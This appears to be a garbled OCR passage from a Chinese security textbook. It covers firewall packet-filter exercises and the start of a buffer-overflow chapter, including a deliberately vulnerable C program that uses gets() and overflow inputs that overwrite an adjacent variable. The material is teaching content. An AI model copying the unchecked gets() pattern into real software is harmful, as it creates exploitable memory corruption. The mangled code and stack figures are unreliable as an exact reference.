户 端 部 分 的 TCP 端口 号 在 1023 以 上 。 假 设 你 要 做 一 个 包 过 滤 策 略 集 来 允许 进出 的 SMTP 网 络 流 
量 ， 并 且 生 成 了 如 下 的 规则 集 : 








a. 描述 这 些 规则 的 作用 。 

b. 假设 你 的 主机 在 这 个 例子 中 的 IP 地 址 是 172.16.1.1。 某 个 人 想 从 IP 地 址 为 192.168.3.4 的 远程 主 
机 发 邮件 给 你 。 如 果 成 功 了 ， 则 将 会 在 远程 主机 和 你 机 器 上 的 SMTP 服务 之 间 建 立 一 个 由 SMTP 
命令 和 邮件 组 成 的 SMTP 会 话 。 另 外 ， 假 设 你 主机 上 的 一 个 用 户 想 发 送 电子 邮件 到 远程 主机 上 的 
SMTP 服务 器 上 。 则 这 一 过 程 会 产生 如 下 的 四 个 典型 的 包 : 


方向 址 协议 


172.16.1.1 192.168.3.4 1234 
192.168.3.4 172.16.1.1 1357 


指出 哪些 包 将 会 被 允许 或 者 阻止 ， 并 且 指 出 每 种 情况 使 用 了 哪 条 规则 。 

c. 假设 外 部 的 某 个 人 试图 从 IP 地 址 为 10.1.2.3 的 远程 主机 上 通过 该 主机 上 的 5150 端口 建立 一 个 到 
本 地 主机 ( 172.16.3.4 ) 上 运行 的 Web 代理 服务 器 (端口 为 8080 ) 的 连接 ， 来 发 动 一 个 远程 攻击 。 
典型 的 包 显 示 如 下 : 
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这 个 攻击 会 成 功 吗 ? 给 出 详细 说 明 。 
9.6 ”为 了 提供 更 好 的 保护 ， 对 前 面 几 个 问题 中 的 策略 集 进行 了 如 下 的 修改 : 





a. 描述 这 些 修改 。 
b. 将 这 个 新 的 规则 集 应 用 到 上 一 题 的 6 个 包 中 。 指 明 哪些 包 会 被 允许 或 者 被 拒绝 ， 并 指明 每 种 情况 
使 用 了 哪 条 规则 。 
97 一 个 攻击 者 试图 用 他 /她 自己 机 器 上 的 25 号 端口 建立 一 个 到 你 的 Web 代理 服务 器 的 连接 。 
a. 会 产生 如 下 的 数据 包 : 


解释 为 什么 使 用 上 一 题 的 规则 集 时 该 次 攻击 会 成 功 。 
b. 当初 始 化 一 个 TCP 连接 的 时 候 ，TCP 消息 头 的 ACK 位 没有 被 设 定 。 但 是 接 下 来 ， 所 有 通过 该 连 
接 的 TCP 包 的 消息 头 都 设置 了 ACK 位 。 根 据 这 个 提示 ， 修 改 前 面 上 一 题 的 规则 集 ， 使 它 能 够 阻 
止 刚才 所 描述 的 攻击 。 
9.8 在 9.6 节 中 介绍 了 5 种 被 NIPS 设备 用 来 检测 攻击 的 方法 。 写 出 每 个 方法 的 优点 和 缺点 。 
99 一 个 通用 的 管理 要 求 是 “所 有 外 部 的 Web 网 络 流量 必须 经 过 机 构 的 Web 代理 ”。 然 而 ， 这 个 需求 真 
是 “说 起 来 容易 做 起 来 难 ” 啊 ! 讨论 一 下 ， 要 支持 这 样 的 需求 所 面临 的 问题 ， 并 提出 可 能 的 解决 方 
法 及 其 局 限 性 。 特 别 地 ， 在 Web 浏览 器 和 服务 器 要 使 用 大 量 的 端口 和 很 多 的 协议 的 情况 下 ， 考 虑 解 
决 如 何 精确 地 判定 哪些 是 “Web 网 络 流量 ”并 且 如 何 监视 这 些 网 络 流量 的 问题 。 
9.10 考虑 “ 盗 取 /破坏 系统 所 有 权 或 者 关键 数据 文件 中 的 机 密 信 息 ” 的 威胁 。 这 种 破坏 可 能 发 生 的 一 种 
方式 是 偶然 或 者 有 意 地 给 机 构 外 面 的 用 户 发 送 电子 邮件 。 对 于 这 种 情况 的 一 种 解决 方法 是 要 求 所 
有 外 出 的 电子 邮件 都 具有 一 个 关于 信件 内 容 的 敏感 性 标签 (或 者 分 类 )， 并 且 要 求 所 有 向 外 发 出 的 
邮件 都 要 具有 最 小 的 等 级 敏感 标签 。 讨 论 一 下 ， 这 样 的 方法 如 何在 防火 墙 上 实现 ， 要 实现 这 个 方 
法 ， 防 火 墙 需要 哪些 组 成 部 分 和 体系 结构 。 
9.11 要求 使 用 像 图 9-2 那样 的 防火 墙 来 实现 如 下 的 “ 非 正式 防火 墙 策略 ”的 细节 : 
1. 电子 邮件 可 能 使 用 SMTP 协议 从 防火 墙 内 外 两 端 发 送 ， 但 是 它 必须 经 过 DMZ 邮件 网 关 的 转发 。 
DMZ 邮件 网 关 提 供 了 头 处 理 和 内 容 过 滤 功 能 。 外 来 的 电子 邮件 必须 被 转 到 DMZ 邮件 服务 器 上 。 
2. 内 部 的 用 户 使 用 POP3 或 者 POP3S 协议 并 进行 自我 认证 ， 就 能 够 从 DMZ 邮件 网 关上 获取 他 们 自 
己 的 邮件 。 
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9.12 


9.13 


9.14 


3. 外 部 的 用 户 只 能 使 用 安全 的 POP 协议 并 进行 自我 认证 才能 够 从 DMZ 邮件 网 关上 获取 自己 的 
邮件 。 

4. 内 部 用 户 通过 防火 墙 的 Web 请 求 (包括 安全 的 和 非 安全 的 ) 都 会 被 允许 ， 但 是 必须 通过 DMZ 
Web 代理 转发 。DMZ Web 代理 能 够 提供 内 容 过 滤 (注意 这 种 过 滤 不 能 处 理 安全 的 请 求 )。 并 且 用 
户 必须 跟 这 个 代理 进行 认证 ， 以 便于 记录 。 

5. 从 Intemet 上 到 DMZ Web 服务 器 上 的 任何 Web 请 求 (包括 安全 和 非 安全 的 ) 都 会 被 允许 。 

6. 允许 内 部 用 户 请 求 DNS 查询 ， 但 需要 通过 DMZ DNS 服务 器 。 由 DMZ DNS 服务 器 到 Internet 
上 去 查询 。 

7. 外 部 的 DNS 查询 由 DMZ DNS 服务 器 提供 。 

8. 对 DMZ 服务 器 的 管理 和 信息 更 新 只 能 通过 安全 的 shell 连接 ， 由 相应 的 经 过 认证 的 内 部 用 户 来 
完成 (可 以 在 每 个 系统 上 设置 合适 的 不 同 的 用 户 集 )。 

9. SNMP 管理 请 求 由 内 部 的 管理 主机 到 防火 墙 是 被 允许 的 ， 而且 防 火 墙 也 允许 发 送 管理 陷 门 ( 例 
如 ， 发 生 某 些 事情 的 通知 ) 到 管理 主机 上 。 

设计 合适 的 可 以 在 “外 部 防火 墙 ” 和 “内 部 防火 墙 ” 上 实现 的 包 过 滤 规 则 集 (类 似 于 表 9-1 显 

示 的 那样 )， 以 满足 上 述 提 到 的 策略 需求 。 

在 内 部 协作 网 络 中 ,我们 有 一 个 仅 用 于 测试 的 内 部 Web 服务 器 ， 地 址 是 5.6.7.8。 包 过 滤器 位 于 内 

网 和 Internet 其 他 部 分 之 间 的 遏制 点 上 。 该 包 过 滤器 能 够 阻止 所 有 外 部 主机 向 那 台 内 部 Web 服务 

器 发 起 的 TCP 连接 请 求 吗 ? 如 果 能 ， 请 设计 合适 的 包 过 滤 规 则 来 提供 这 样 的 功能 ( 像 表 9-1 那样 ); 

如 果 不 能 ， 解 释 为 何不 能 。 

在 防御 服务 器 、 台 式 机 、 笔 记 本 上 ， 为 了 对 抗 网 络 威胁 ， 有 如 下 几 种 部 署 防火 墙 的 场景 ， 请 分 别 

解释 每 种 方法 的 优点 和 不 足 : 

a. 防火 墙 放置 在 网 络 外围 。 

b. 防火 墙 放置 在 每 台 主 机 端 。 

c. 防火 墙 放置 在 网 络 外 围 和 每 台 主 机 端 。 

考虑 第 8 章 给 出 的 用 于 检测 SYN-FIN 攻击 的 Snort 规则 集 的 例子 。 假 定 这 个 规则 用 在 Snort Inline 

IPS 上 ， 你 将 如 何 修改 规则 来 阻止 这 种 包 进 入 家 庭 网 络 ? 
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缓冲 区 溢出 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 ， 

e 定义 什么 是 缓冲 区 溢出 ， 列 出 可 能 产生 的 后 果 ; 
© 详细 描述 栈 缓冲 区 溢出 是 如 何 产生 的 ; 


@ 定义 shellcode， 描 述 在 缓冲 区 溢出 攻击 中 它 所 起 的 作用 ; 
e 列 出 针对 缓冲 区 溢出 攻击 的 各 种 防范 措施 ; 
© 列 出 各 种 其 他 类 型 的 缓冲 区 溢出 攻击 。 





本 章 我 们 重点 讨论 缓冲 区 溢出 攻击 。 这 种 类 型 的 攻击 是 我 们 所 见 到 的 最 普遍 的 攻击 方式 之 
一 ， 它 往往 是 由 于 在 应 用 程序 开发 中 不 细心 的 编程 而 导致 的 。 一 些 组 织 ， 如 CERT 或 SANS, 
公布 的 漏洞 咨询 列表 中 显示 了 大 量 的 缓冲 区 溢出 或 者 堆 溢 出 漏洞 ， 包 括 许多 严重 的 、 可 被 远程 
攻击 利用 的 漏洞 。 类 似 地 ， 在 CWE/SANS 公布 的 25 种 最 危险 的 软件 错误 名 单 和 风险 最 大 的 资 
源 管 理 类 别 中 ， 就 有 数 项 是 属于 缓冲 区 溢出 的 变种 。 它 们 不 仅 会 导致 对 操作 系统 和 普通 应 用 程 
序 的 漏洞 的 利用 ， 且 至 今 仍然 是 正在 被 广泛 使 用 的 漏洞 攻击 工具 包 [VEEN12] 中 大 多 数 攻 击 方 
法 的 组 成 部 分 。 缓 冲 区 溢出 类 型 的 攻击 ， 自 从 1988 年 被 Morris 蠕虫 广泛 使 用 以 来 ， 人 们 已 经 
对 其 有 所 了 解 ， 而 且 阻 止 它 发 生 的 技术 也 被 人 们 所 熟知 并 被 记载 在 文档 中 。 表 10-1 给 出 了 组 
冲 区 溢出 攻击 发 展 历史 上 一 些 非常 受 人 关注 的 事件 。 不 幸 的 是 ， 无 论 是 由 于 满 是 bug 但 又 一 直 
以 来 服务 于 广泛 普及 的 操作 系统 和 应 用 程序 的 遗留 代码 ， 还 是 由 于 许多 系统 没有 及 时 地 升级 和 
打 补 丁 ， 又 或 是 拜 前 赴 后 继 的 程序 员 们 一 如 既往 的 马虎 的 编程 习惯 所 赐 ， 组 冲 区 溢出 至 今 仍然 
是 安全 从 业 人 员 的 一 大 主要 顾虑 。 这 一 章 我 们 着 重 讨 论 ， 缓 冲 区 溢出 是 如 何 发 生 的， 以 及 使 用 
什么 方法 能 够 阻止 或 者 检测 它 的 发 生 等 问题 。 


表 10-1 缓冲 区 溢出 攻击 简 史 
1988 Morris Internet 蠕虫 在 “fingerd” 中 使 用 一 种 缓冲 区 溢出 作为 其 攻击 机 制 之 一 
1995 一 个 缓冲 区 溢出 在 NCSA httpd 1.3 上 被 发 现 ，Thomas Lopatic 将 其 公布 在 Bugtraq 邮件 列表 中 


Aleph One 在 《 Phrac 》 杂 志 上 发 表 了 题 为 “ Smashing the Stack for Fun and Profit” 的 文章 ， 其 中 


1996 | _ 步 一 步 地 给 出 利用 基于 栈 缓冲 区 溢出 漏洞 的 攻击 方法 


2001 Code Red 蠕虫 利用 了 微软 IIS 5.0 的 一 个 缓冲 区 溢出 
2003 Slammer 蠕虫 利用 了 微软 SQL Server 2000 的 一 个 缓冲 区 溢出 
2004 Sasser 蠕虫 病毒 利用 了 微软 Windows 2000/XP Local Security Authority Subsystem Service ( LSASS) 


的 一 个 缓冲 区 溢出 


我 们 首先 介绍 缓冲 区 溢出 的 基本 知识 ,然后 给 出 典型 的 栈 缓冲 区 溢出 的 细节 ， 包 括 讨 论 函 
数 在 栈 里 是 如 何 存储 它 的 局 部 变量 的 ， 以 及 试图 在 栈 里 存储 更 多 数据 时 ， 当 数据 所 占 的 地 址 比 
栈 的 可 用 地 址 空间 多 时 所 产生 的 后 果 。 接 着 ,我 们 对 shellcode 的 目的 和 设计 进行 概括 的 分 
析 ， 其 中 shellcode 是 攻击 者 注入 的 定制 代码 ， 由 于 缓冲 区 溢出 ， 它 会 获得 系统 的 控制 权 。 
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然后 ， 我 们 考虑 缓冲 区 溢出 攻击 的 防御 方法 。 首 先 从 防止 发 生 缓冲 区 溢出 最 明显 的 方法 开 
始 ， 那 就 是 避免 编写 容易 导致 缓冲 区 溢出 漏洞 的 代码 。 然 而 ， 对 于 给 定 庞大 且 存 在 很 多 bug 的 
代码 体 来 说 ， 我 们 还 需要 考虑 能 够 检测 并 阻止 缓冲 区 溢出 攻击 的 硬件 和 软件 机 制 ， 包 括 可 执行 
的 地 址 空间 保护 的 机 制 、 检 测 栈 修改 的 技术 、 随 机 化 地 址 空间 布局 从 而 成 功 干扰 这 些 攻 击 执行 
的 方法 。 

最 后 ， 简 要 地 分 析 一 些 其 他 的 溢出 技术 ， 包 括 返回 导向 的 系统 调用 ( return to system call), 
堆 溢出 及 其 相应 的 防御 方法 。 
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10.1.1 缓冲 区 溢出 的 基本 知识 


缓冲 区 溢出 (buffer overflow at buffer overrun) 在 NIST 的 信息 安全 关键 术语 词汇 表 (NIST 
Glossary of Key Information Security Terms) 中 是 这 样 定 义 的 : 


缓冲 区 溢出 是 指 接口 的 一 种 状况 ， 此 时 大 量 的 输入 被 放置 到 缓冲 区 或 者 数据 存储 区 ， 超 过 


了 其 所 分 配 的 存储 能 力 ， 和 覆盖 了 其 他 信息 。 攻 击 者 利用 这 样 的 状况 破坏 系统 或 者 插入 特别 
编制 的 代码 ， 以 获得 系统 的 控制 权 。 





缓冲 区 溢出 是 作为 编程 错误 的 结果 而 发 生 的 ， 此 时 ， 一 个 进程 试图 存储 超出 缓冲 区 存储 
容量 (HERE) 的 数据 ， 从 而 导致 相 邻 的 内 存 区 域 被 覆盖 。 这 些 内 存 区 域 可 能 保存 着 其 他 程 
序 的 变量 或 者 参数 ， 也 可 能 保存 着 程序 控制 流 数据 ， 例 如 返回 地 址 和 指向 前 一 个 栈 帧 的 指针 。 
缓冲 区 可 能 被 设置 在 进程 的 栈 区 、 堆 区 ， 或 者 数据 区 。 发 生 缓冲 区 溢出 错误 的 后 果 包 括 : 程 
序 使 用 的 数据 受到 破坏 、 在 程序 中 发 生意 外 的 控制 权 转 移 、 可 能 的 内 存 非 法 访问 ， 以 及 很 可 
能 最 终 导致 程序 终止 。 当 缓冲 区 溢出 被 用 于 蓄意 攻击 系统 时 ， 系 统 的 控制 权 可 能 会 被 转移 到 
攻击 者 选择 的 代码 ， 因 此 导致 被 攻击 进程 的 特权 被 用 于 执行 攻击 者 任意 想 要 执行 的 代码 。 

为 了 说 明 缓 冲 区 溢出 的 基本 操作 ， 我 们 考虑 图 10-1a 中 给 出 的 一 个 C 语言 主 函数 。 在 这 个 
主 函数 中 ， 包 含 3 个 变量 (valid、strl 和 str2 ) 8， 它 们 的 值 通常 被 存储 在 相 邻 的 存储 单元 中 。 
存储 的 次 序 和 位 置 是 由 变量 类 型 (局 部 的 或 者 全 局 的 )、 所 用 的 编程 语言 和 编译 器 ， 以 及 目标 
机 器 的 结构 决定 的 。 然 而 ， 由 于 我 们 在 这 个 实例 中 想 要 看 到 缓冲 区 发 生 溢出 ， 所 以 我 们 假设 这 
几 个 变量 从 内 存 高 端 到 低 端 连 续 存 储 ， 如 图 10-2 @ 所 示 。 这 是 C 语言 函数 中 的 局 部 变量 在 通 
用 的 处 理 器 上 典型 的 存储 方式 ， 例 如 Intel Pentium 系列 处 理 器 。 这 个 代码 段 的 目的 是 调用 函数 
next tag (strl )， 把 一 些 希望 的 标记 值 (tag value) 复制 给 str1。 假 设 这 个 标记 值 是 字符 串 
START。 接 着 程序 调用 C HERA gets() 从 标准 输入 中 读 人 下 一 行 字符 串 ， 并 与 读 和 的 希望 的 
标记 值 进 行 比 较 。 如 果 下 一 行 读 和 的 字符 串 与 字符 串 START 匹配 ， 那 么 这 次 比较 就 成 功 了 ， 
变量 valid 被 设置 为 TRUE @。 这 是 在 图 10-lb @ 中 显示 的 三 次 运行 程序 的 第 一 次 运行 的 情况 。 
任何 其 他 的 输入 标记 都 会 使 valid 的 值 变 为 FALSE。 这 样 的 一 个 代码 段 常 被 用 于 解析 一 些 结构 


”在 这 个 例题 中 ， 标 志 (flag) 变量 按照 整 型 存储 ， 不 是 布尔 型 的 ， 这 是 因为 它 是 标准 的 C 语言 的 风格 ， 也 可 以 避 
免 在 存储 时 字 对 齐 的 问题 。 这 个 缓冲 区 故意 设置 得 很 小 ， 以 便 能 够 突出 说 明 我 们 正在 讨论 的 缓冲 区 溢出 的 问题 。 

日 在 这 个 图 以 及 相关 的 图 中 ， 地 址 值 和 数据 值 都 是 用 十 六 进 制 表示 的 。 在 适当 的 时 候 数据 值 也 可 用 其 对 应 的 
ASCII 码 来 表示 。 

© ECHA, 逻辑 值 FALSE 和 TRUE 就 是 分 别 取 值 为 0 和 1 (或 者 事实 上 是 任 一 非 零 值 ) 的 两 个 简单 的 整 
数 。 经 常 使 用 符号 定义 ， 用 符号 的 名 字 代 替 它 们 原本 定义 的 值 ， 就 像 我 们 在 这 个 程序 中 所 做 的 一 样 。 

®© 本章 中 ， 本 例 和 其 他 的 所 有 例题 都 是 在 Pentium 处 理 器 上 运行 的 Knoppix Linux 系统 中 产生 的 ， 其 中 使 用 的 
编译 器 为 GNU GCC， 程 序 调试 器 为 GDB。 
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化 网 络 协议 间 的 相互 作用 或 者 格式 化 的 文本 文件 。 


int main(int argc, char *argv[]) { 
int valid = FALSE; 
char str1[8]; 
char str2[8]; 


next_tag (strl); 


gets(str2); 
if (strncemp(strl, str2, 
valid = TRUE; 
printf ("bufferl: strl(%s), str2(%s), valid(%d)\n", strl, str2, valid); 








a) 基本 的 缓冲 区 溢出 的 C 代 码 
$ cc -g -o bufferl bufferl.c 
$ ./bufferl 
START 
bufferl: str1(START), str2(START), valid(1) 
$ ./bufferl 
EVILINPUTVALUE 
bufferl: strl (TVALUE), str2(EVILINPUTVALUE), valid(0) 
$ ./bufferl 
BADINPUTBADINPUT 
bufferl: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1) 
b) 基本 的 缓冲 区 溢出 的 运行 示例 
339 图 10-1 基本 的 缓冲 区 溢出 示例 
get( str2 ) get( str2 ) 
内 存 地 址 。 “调用 之 前 调用 之 后 ERWA 


34fcffbf 

bat 
bffffbf0 01000000 
c6bd0340 
©.. @ 
bffffbe8 O8fcffbt 
bffffbe4 00000000 
80640140 

bammeo 
54001540 

bttmbde 
53544152 

bttrbd8 

bento 
30561540 
bffffbdO ov.@ 


10-2 ”基本 的 缓冲 区 溢出 的 栈 值 


这 段 代 码 是 存在 问题 的 ， 这 是 因为 传统 的 CAA WERK gets 对 数据 复制 的 数量 没有 包 
含 任何 检查 。 该 函数 从 程序 的 标准 输入 中 读 取 下 一 行 的 文本 直到 第 一 个 换行 符 S (newline) 出 现 


argv 


i 
c6bd0340 返回 地 址 


i Bat 
基地 址 指针 


01000000 
valid 





00640140 
.d.e@ 
4e505554 
strl[4~7] 
42414449 
strl[0-3] 
Ae505554 
str2[4-7] 
42414449 . 
BADI str2[0-3] 





© 换行 newline (NL) 或 linefeed (LF) 符 是 UNIX 系统 一 行 终止 的 标准 结束 方式 。 对 于 C 语言 来 说 ， 它 用 
ASCII 码 值 为 0x0a 的 字符 表示 一 行 终止 。 
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为 止 ， 并 将 这 些 文本 在 末尾 加 上 一 个 C 语言 字符 串 S 使 用 的 NULL 之 后 ,复制 到 提供 的 缓冲 区 
内 。 如 果 在 输入 行 出 现 的 字符 多 于 7 个 ,那么 在 读 人 的 时 候 (连同 结束 字符 NULL) 它们 将 需 
要 比 str2 的 有 效 缓冲 区 更 多 的 地 址 空间 ， 结 果 造 成 多 余 的 字符 覆盖 了 相 邻 变量 的 值 ， 此 例 中 相 
邻 的 变量 就 是 str1。 人 例如， 如果 输入 的 字符 串 是 EVILINPUTVALUE， 那 么 stri 会 被 改写 为 
TVALUE， 而 str2 使 用 的 不 仅 是 分 配给 它 的 8 个 字符 ， 还 包括 strl 的 7 个 字符 ， 这 可 以 从 图 
10-1b 中 第 二 次 运行 的 结果 中 看 到 。 滋 出 导致 一 个 变量 strl 受到 破坏 ， 它 使 用 的 值 已 经 不 是 直 
接 保存 的 输入 内 容 ， 而 是 被 改写 以 后 的 值 。 因 为 这 两 个 字符 串 不 相同 ， 所 以 变量 valid 取 值 为 
FALSE。 更 进一步 ， 如 果 输 入 16 个 或 者 更 多 的 字符 ， 那 么 将 会 覆盖 另外 相 邻 的 内 存 区 域 。 

上 面 的 例子 说 明了 缓冲 区 溢出 的 基本 行为 。 简 单 地 讲 ， 就 是 将 任何 未 做 检查 的 数据 
复制 到 一 个 缓冲 区 能 够 导致 相 邻 的 内 存 区 域 受 到 破坏 。 这 个 区 域 可 能 是 其 他 变量 的 ， 或 
者 像 我 们 下 面 将 看 到 的 那样 ， 可 能 是 程序 的 控制 地 址 和 数据 。 即 使 是 这 个 简单 的 例子 我 
们 也 能 进一步 来 讨论 。 攻 击 者 一 旦 知道 处 理 该 程序 的 代码 结构 ， 他 就 能 够 安排 改写 值 写 
入 str1， 使 其 与 str2 中 的 值 相同 ， 从 而 使 得 比较 能 够 成 功 。 例 如 ， 输 入 行 可 以 是 字符 串 
BADINPUTBADINPUT， 这 就 导致 了 比较 成 功 ， 如 图 10-1b 中 程序 实例 的 第 三 次 运行 中 显示 
的 结果 以 及 图 10-2 中 对 函数 gets) 调用 前 后 局 部 变量 值 的 说 明 所 示 。 我 们 也 注意 到 ， 在 输入 
字符 串 时 ，NULL 已 经 被 写 人 到 紧 随 strl 末尾 的 内 存 区 域 中 。 这 也 就 是 说 程序 的 控制 流 将 继 
续 ， 就 好 像 已 经 发 现 所 希望 的 字符 串 结束 标记 一 样 。 但 事实 上 ， 读 人 的 标记 是 一 些 完全 不 同 
的 内 容 。 这 就 造成 程序 行为 不 是 我 们 想 要 的 行为 ， 其 严重 程度 主要 依赖 于 受到 攻击 的 程序 的 
内 在 逻辑 。 如 果 替 换 的 是 缓冲 区 中 的 一 个 标记 值 ， 该 值 是 一 个 希望 提供 的 、 用 于 访问 特权 特 
征 的 口令 ,危险 就 可 能 发 生 。 如 果 是 这 样 ， 缓 冲 区 溢出 就 为 攻击 者 提供 了 在 不 知道 正确 口令 
的 情况 下 能 够 访问 这 些 特征 的 方法 。 

要 想 利用 任何 一 种 类 型 的 缓冲 区 溢出 ， 例 如 已 经 举例 说 明 的 那些 程序 ， 攻 击 者 需要 : 

1. 在 一 些 程序 中 识别 缓冲 区 溢出 漏洞 ， 这 些 漏 洞 在 攻击 者 的 控制 下 使 用 外 部 的 数据 资源 能 
够 被 触发 。 

2. 并 且 要 理解 缓冲 区 是 如 何 存储 在 进程 的 内 存 中 的 ， 以 及 因此 破坏 相 邻 的 内 存 区 域 和 改变 
程序 的 执行 流 的 可 能 性 。 

识别 有 漏洞 的 程序 可 以 通过 检查 源 代 码 ， 在 程序 处 理 过 长 的 输入 时 跟踪 程序 的 执行 ， 或 者 
使 用 一 些 工 具 ， 例 如 fuzzing 技术 ， 该 技术 我 们 在 10.2 节 中 讨论 ， 它 可 以 自动 识别 可 能 存在 漏 
洞 的 程序 。 利 用 缓冲 区 溢出 所 造成 的 对 内 存 的 破坏 ， 攻 击 者 可 以 随心 所 欲 地 做 一 些 事情 ， 但 这 
依赖 于 所 改写 的 值 的 情况 。 在 接 下 来 的 几 节 中 ， 我 们 将 探讨 另外 的 一 些 情况 。 

在 进一步 讨论 缓冲 区 溢出 问题 以 前 ， 我 们 有 必要 考虑 导致 缓冲 区 溢出 发 生 的 情况 是 如 何 产 
生 的 ?为 什么 程序 未 必 能 避免 此 类 错误 的 发 生 ? 为 了 理解 这 些 问 题 ， 我 们 首先 简 述 一 下 程序 语 
言 的 发 展 历史 和 计算 机 系统 的 基本 操作 。 在 计算 机 的 底层 ， 通 过 计算 机 处 理 器 运行 机 器 指令 来 
完成 操作 的 所 有 数据 ， 都 存储 在 处 理 器 的 寄存 器 或 者 内 存 中 。 数 据 仅 仅 是 字 节 数组 ， 对 它们 的 
解释 完全 由 访问 它们 的 指令 的 功能 来 决定 。 一 些 指 令 将 这 些 字 节 当 作 整 数值 来 处 理 ， 其 他 的 则 
作为 数据 或 者 指令 的 地 址 ， 以 及 字符 数组 。 在 寄存 器 或 内 存 中 没有 什么 是 固有 的 东西 ， 这 就 能 
够 说 明 对 某 些 内 存 区 域 可 以 有 其 他 的 解释 。 因 此 ， 汇 编 语言 程序 员 有 义务 保证 对 任何 保存 的 数 
据 值 设 置 正确 的 解释 。 汇 编 语 言 (以 及 机 器 语言 ) 程序 的 使 用 ， 使 得 程序 员 对 计算 机 系统 资源 
具有 了 最 大 的 访问 权限 ， 但 是 程序 员 在 编码 过 程 中 付出 了 最 高 的 代价 并 承担 了 更 多 的 责任 。 


O 在 C 语 言 中 字符 串 是 以 字符 数组 的 形式 进行 存储 的 ， 字 符 串 总 是 以 一 个 ASCII 码 值 为 0x00 的 NULL 作为 
结束 的 标志 。 在 数组 里 没有 被 定义 字符 串 占 据 的 任何 保留 位 置 都 还 保留 着 以 前 存储 在 该 内 存 区 域 的 值 。 在 
图 10-2 的 “调用 之 前 ” 列 中 ， 能 很 明显 地 看 到 在 变量 str2 里 有 以 前 存储 的 值 。 
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在 与 汇编 语言 对 应 的 编程 语言 发 展 的 另 一 端 ，Java、ADA 和 Python 等 现代 高 级 程序 设计 
语言 ， 以 及 很 多 其 他 的 语言 都 有 一 个 关于 变量 类 型 的 较 强 的 概念 ， 并 且 在 它们 之 上 建立 了 允许 
对 其 进行 的 操作 。 这 些 语 言 一 般 不 会 发 生 缓冲 区 溢出 ， 因 为 它们 不 允许 超出 缓冲 区 存储 容量 的 
数据 存 人 缓冲 区 中 。 这 些 语言 更 高 的 抽象 级 别 和 安全 的 使 用 特性 ， 意 味 着 程序 员 可 以 付出 更 多 
的 精力 去 关注 如 何 解 决 手边 的 问题 ， 不 用 过 多 关注 与 变量 交互 的 管理 细节 。 但 是 这 种 灵活 性 和 
安全 性 在 资源 的 使 用 上 需要 付出 一 定 的 代价 ， 包 括 在 编译 时 ， 以 及 在 运行 时 必须 对 执行 的 附加 
代码 进行 强制 检查 ， 比 如 ， 检 查 缓冲 区 的 限制 。 与 底层 的 机 器 语言 和 结构 的 距离 也 意味 着 不 能 
访问 一 些 指令 和 硬件 资源 。 这 就 限制 了 在 编写 代码 时 对 这 些 资源 的 使 用 ， 例 如 各 种 硬件 的 驱动 
程序 ， 必 须要 与 这 些 资源 交互 。 

有 一 些 编程 语言 介 于 汇编 语言 和 上 述 高 级 语言 之 间 ， 例 如 C 语言 及 其 派生 的 语言 ， 它 们 
不 仅 拥 有 很 多 现代 的 高 级 控制 结构 和 数据 的 抽象 类 型 ， 而 且 还 提供 了 直接 访问 和 操作 内 存 数 据 
的 能 力 。C 语言 是 由 Dennis Ritchie 于 20 世纪 70 年 代 在 贝尔 实验 室 设计 出 来 的 ， 它 最 早 用 于 
编写 UNIX 操作 系统 和 很 多 在 该 系统 上 运行 的 应 用 程序 。C 语言 的 不 断 成 功 是 因为 它 在 具有 高 
级 控制 和 数据 结构 的 表示 能 力 的 同时 ， 还 具有 访问 底层 机 器 资源 的 能 力 ; 也 因为 它 可 以 非常 方 
便 地 移植 到 一 系列 处 理 器 结构 中 。UNIX 是 最 早 用 高 级 语言 编写 的 操作 系统 之 一 ， 这 是 值得 我 
们 注意 的 。 在 那 以 前 (事实 上 那 时 以 后 的 很 多 年 也 是 如 此 )， 操 作 系 统一 般 是 由 汇编 语言 来 编 
写 的 ， 因 而 限制 了 它们 只 能 在 一 个 特定 的 处 理 器 结构 上 使 用 。 不 幸 的 是 ， 对 底层 的 机 器 资源 访 
问 的 能 力 ， 意 味 着 程序 语言 容易 对 内 存 造 成 不 恰当 的 使 用 。 很 多 常见 的 广泛 使 用 的 库 函 数 ， 特 
别 是 那些 与 字符 串 输 入 和 处 理 相关 的 ， 不 能 对 使 用 的 缓冲 区 的 长 度 进行 检查 ， 这 个 事实 使 得 问 
题 进一步 恶化 。 由 于 这 些 函 数 的 通用 性 且 被 广泛 应 用 ， 以 及 UNIX 和 它 派 生 的 操作 系统 〈 如 ， 
Linux 系统 等 ) 的 广泛 配置 使 用 ， 都 意味 着 存在 一 个 庞大 的 可 继承 的 代码 体 使 用 这 些 不 安全 的 
函数 ， 因 此 容易 导致 缓冲 区 溢出 。 在 我 们 讨论 应 对 缓冲 区 溢出 的 对 策 之 前 ， 我 们 还 是 先 回 到 组 
冲 区 溢出 这 个 问题 上 。 


10.1.2 ” 栈 缓 冲 区 溢出 


当 目标 缓冲 区 被 设置 在 栈 区 时 ， 所 发 生 的 缓冲 区 溢出 就 是 栈 缓冲 区 溢出 (stack buffer 
overflow)， 栈 缓冲 区 通常 被 当 作 一 个 函数 的 栈 帧 中 的 局 部 变量 。 这 种 形式 的 攻击 又 被 称 为 栈 溢 
出 攻击 ( stack smashing)。 自 从 1988 年 Morris Internet 蠕虫 首次 被 发 现 ， 栈 缓冲 区 溢出 攻击 就 
出 现 了 。 这 种 攻击 利用 了 一 个 未 经 检查 的 缓冲 区 溢出 ， 而 溢出 是 由 于 在 守护 进程 fngerd 中 使 
用 C 语 言 的 库 函 数 gets() 导致 的 。Aleph One (Elias Levy) 关于 攻击 的 细节 和 如 何 发 起 攻击 的 文 
章 [LEVY96] 进一步 加 速 了 该 技术 的 应 用 。 在 这 一 章 的 引言 中 我 们 就 已 经 指出 ， 栈 缓冲 区 洲 
出 一 直 被 广泛 利用 ， 因 为 在 广泛 使 用 的 软件 中 新 的 漏洞 不 断 被 发 现 。 

函数 调用 机 制 ” 为 了 帮助 我 们 更 好 地 理解 缓冲 区 溢出 是 如 何 运 作 的 ， 首 先 简 要 介绍 程序 中 
的 函数 在 每 一 次 调用 时 管理 它们 的 本 地 状态 所 使 用 的 机 制 。 当 一 个 函数 调用 另 一 个 函数 时 ， 至 
少 它 需 要 在 某 个 地 方 保存 返回 地 址 ， 这 样 当 调用 完成 以 后 被 调用 的 函数 能 够 将 控制 权 返 还 给 调 
用 函数 。 除 此 之 外 ， 还 需要 一 些 存 储 单元 保存 传递 给 被 调用 函数 的 参数 ， 以 及 当 被 调用 的 函数 
